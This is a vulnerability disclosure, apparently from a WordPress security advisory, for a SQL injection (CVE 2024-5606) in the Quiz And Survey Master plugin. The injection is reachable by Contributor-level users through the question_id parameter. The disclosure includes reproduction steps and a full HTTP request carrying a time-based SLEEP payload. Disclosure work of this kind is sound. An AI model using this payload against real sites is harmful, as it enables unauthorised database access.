Quiz And Survey Master < 9.0.2 – Contributor+ SQLi | CVE 2024-5606

Description

The plugin is vulnerable does not validate and escape the question_id parameter in the qsm_bulk_delete_question_from_database AJAX action, leading to a SQL injection exploitable by Contributors and above role

Proof of Concept

1) You will need a valid nonce for deletion of quiz questions. 
2) Sign in as a Contributor, create a quiz with at least one question.
3) Edit the Quiz and click the "Delete All" button to fire off the right request with a valid nonce.
4) Replace the question ID with the payload below to sleep for 5 seconds: 

(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: test.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://test.site/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 118
Origin: http://test.site
Connection: keep-alive
Cookie: Contributor_Cookie

action=qsm_bulk_delete_question_from_database&question_id=(SELECT%20%2a%20FROM%20(SELECT(SLEEP(5)))a)&nonce=577a29f6f1